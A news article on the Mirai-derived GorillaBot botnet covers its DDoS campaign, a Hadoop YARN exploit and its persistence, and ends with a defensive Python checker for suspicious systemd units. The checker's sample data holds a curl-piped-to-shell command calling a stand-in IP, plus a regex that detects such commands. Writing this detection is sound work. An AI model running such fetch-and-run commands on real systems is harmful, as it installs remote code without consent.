Cybersecurity experts have uncovered a new botnet malware family called Gorilla, also known as GorillaBot, which draws inspiration from the leaked source code of the infamous Mirai botnet.
A recent report reveals that this powerful botnet executed over 300,000 distributed denial-of-service (DDoS) attacks between September 4 and September 27, 2024, issuing an average of 20,000 attack commands daily.
This botnet has spread its reach across more than 100 countries, with key targets including universities, government websites, telecommunications, banks, as well as gaming and gambling platforms. Among the most heavily affected countries are China, the United States, Canada, and Germany.
The malware uses several DDoS methods, including UDP flood, SYN flood, ACK BYPASS flood, Valve Source Engine (VSE) flood, and ACK flood attacks. Because UDP is connectionless, the botnet can spoof source IP addresses and generate massive volumes of traffic. GorillaBot also supports multiple CPU architectures, including ARM, MIPS, and x86 variants, allowing it to infect a wide range of devices.
One particularly concerning feature of GorillaBot is its ability to exploit a vulnerability in Apache Hadoop YARN RPC, enabling remote code execution on affected systems. Although this vulnerability has been known and abused in the wild since 2021, the botnet continues to leverage it in its attacks.
Persistence is achieved by creating a service file on the infected host that ensures the malware runs each time the system starts. The botnet also downloads and executes shell scripts from a remote server, embedding commands in critical system files to maintain long-term control over the compromised devices.
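As an added example (not code from the report or from the malware), a small Python checker that scans systemd unit files for the two persistence traits described above: a service whose Exec command launches a binary from a world-writable directory, or one that pipes a downloaded script into a shell. The unit texts, file paths, IP address and the writable-directory watchlist are constructed for illustration.

```python
import re

# Constructed sample unit files: one benign service and two showing the traits
# the article describes (payload started from a temp directory; remote script
# fetched and piped into a shell). The address is a documentation-range IP.
SAMPLE_UNITS = {
    "/etc/systemd/system/sshd.service": """[Unit]
Description=OpenSSH server
[Service]
ExecStart=/usr/sbin/sshd -D
[Install]
WantedBy=multi-user.target
""",
    "/etc/systemd/system/update.service": """[Unit]
Description=system update
[Service]
ExecStart=/tmp/.x/bot
Restart=always
[Install]
WantedBy=multi-user.target
""",
    "/etc/systemd/system/sync.service": """[Unit]
[Service]
ExecStart=/bin/sh -c "curl -s http://203.0.113.10/s.sh | sh"
[Install]
WantedBy=multi-user.target
""",
}

WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # hypothetical watchlist
FETCH_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")  # download piped to sh

def exec_lines(unit_text):
    """Return the command part of every Exec*= directive (ExecStart, ExecStartPre, ...)."""
    return [line.split("=", 1)[1].strip()
            for line in unit_text.splitlines() if line.startswith("Exec")]

def findings_for_unit(path, unit_text):
    """Flag Exec commands launched from a writable dir or piping a download into a shell."""
    out = []
    for cmd in exec_lines(unit_text):
        if cmd.startswith(WRITABLE_DIRS):
            out.append((path, "exec-from-writable-dir", cmd))
        if FETCH_EXEC.search(cmd):
            out.append((path, "remote-script-exec", cmd))
    return out

def scan_units(units):
    """Scan a {path: unit_text} mapping; returns (path, rule, command) tuples."""
    return [f for path, text in units.items() for f in findings_for_unit(path, text)]
```

In practice the mapping would be built by reading the unit directories on the host; the benign sshd unit produces no finding.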
Researchers note that Gorilla employs advanced encryption techniques, often used by the Keksec group, to obscure key information and avoid detection. Its sophisticated mechanisms to hide its presence and retain control demonstrate the growing complexity of emerging botnet families.
To defend against botnets like Gorilla, organizations should keep systems and software up to date, in particular by patching the known Apache Hadoop YARN RPC vulnerability. Network monitoring and DDoS mitigation measures, such as deploying firewalls and rate limiting, are essential.